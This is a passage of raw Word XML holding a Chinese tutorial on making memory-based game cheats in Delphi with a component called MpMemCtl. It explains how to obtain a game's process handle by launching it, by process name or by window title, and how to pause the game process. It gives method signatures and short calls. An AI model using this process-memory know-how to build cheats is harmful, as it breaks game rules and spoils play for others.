        <w:t>，在访问内存时读取游戏属性时，为了不破坏数据完整性的快速浏览内存地址值，最好一次访问一页。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　在操作进程内存时，不需要再使用汇编语言，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中提供了一些访问进程内存空间的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，便可以直接对进程内存进行操作。但初学者一般掌握不了这一项技术，为了使初学者也能够对内存进行操作，做出基于内存控制的外挂，笔者把一些内存操作及一些内存操作逻辑进行了封装，以控件形式提供给初学者。控件名为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MpMemCtl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　初学者在使用此控件时，要先安装外挂引擎控件包（在此后的每篇文章中外挂引擎控件包仅提供与该文章相应的控制控件），具体控件安装方式，请参阅《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Delphi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指南》，由于篇幅所限，恕不能详细提供。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在引擎安装完成后，便可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Delphi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的组件栏内，找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[MP GameControls]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控件组，其中可以找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[MpMemCtl]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控件。初学者可以使用此控件可以对内存进行控制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　一、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到进程句柄</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　需要操作游戏内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么首先必须确认要操作的游戏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而游戏程序在运行时所产生的每一个进程都有一个唯一的句柄。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　使用控件得到句柄有三种方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过控件打开程序得到句柄。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在控件中，提供了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>startProgram</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，通过该方法，可以打开程序得到进程句柄，并且可以返回进程信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>PProcInfo: PROCESS_INFORMATION;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>MpMemCtl.startProgram(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FilePath:String; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var aProc_Info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PROCESS_INFORMATION //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">BOOLEAN </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　该方法提供了两个参数，第一个参数为要打开的程序路径，第二个参数为打开程序后所创建进程的进程信息。使用这个方法在得到进程信息的同时，并给控件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ProcHandle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（进程句柄）属性进行了附值，这时可以使用控件直接对内存进程读写操作。其应用实例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>Var</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PProcInfo: PROCESS_INFORMATION;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MpMemCtl1.startProgram(edit1.Text, PProcInfo) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、通过控件根据程序名称得到句柄。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在控件中，对系统运行进程也有了相应的描述，控件提供了两个方法，用于根据程序名称得到相应的进程句柄。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getProcIDs()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以得到系统现在所运行的所有程序的名称列表。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getProcID()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过所运行程序名称，得到相应进程的句柄。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getProcIDs():TStrings //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所返回为多行字符串型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>getProcID(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aProcName:String //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>):Thandle; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序进程句柄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　其应用实例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getProcIDs()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并把参数列表返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ComboBox1.Items</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">ComboBox1.Items:=MpMemCtl1.getProcIDs(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　接着可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getProcID()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到相应的进程句柄，并给控件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ProcHandle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（进程句柄）属性进行了附值，这时可以使用控件直接对内存进程读写操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">MpMemCtl1.getProcID(ComboBox1.Text) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、通过控件根据窗口名称得到句柄。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在控件中，控件提供了两个方法，用于根据窗口名称得到相应的进程句柄。可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getALLWindow()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到所有在进程中运行的窗口。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getWinProcHandle()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过相应的窗口名称，得到相应的进程的句柄。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>getALLWindow(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aHandle:THandle //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入当前窗口的句柄</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>):TStrings; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回当前所有运行窗口的名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>getWinProcHandle(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aWindowName:String //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入当前窗口名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>):Thandle; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回窗口的句柄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　其应用实例如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　首先可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getALLWindow ()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并把参数列表返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ComboBox1.Items</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ComboBox1.Items:=MpMemCtl1. getALLWindow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Handle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　接着可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getWinProcHandle ()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到相应的进程句柄，并给控件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ProcHandle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（进程句柄）属性进行了附值，这时可以使用控件直接对内存进程读写操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">MpMemCtl1. getWinProcHandle (ComboBox1.Text); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　二、使游戏暂停</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　在程序中，为了便于更好的得到游戏的当前属性。在控件中提供了游戏暂停方法。只需要调用该方法，游戏便可以自由的暂停或启动。该方法为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pauseProc()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t>pauseProc(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aType:integer //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　控制类型只能够传入参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表使游戏暂停，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表取消暂停。其应用实例如下：</w:t>
      </w:r>
    </w:p>
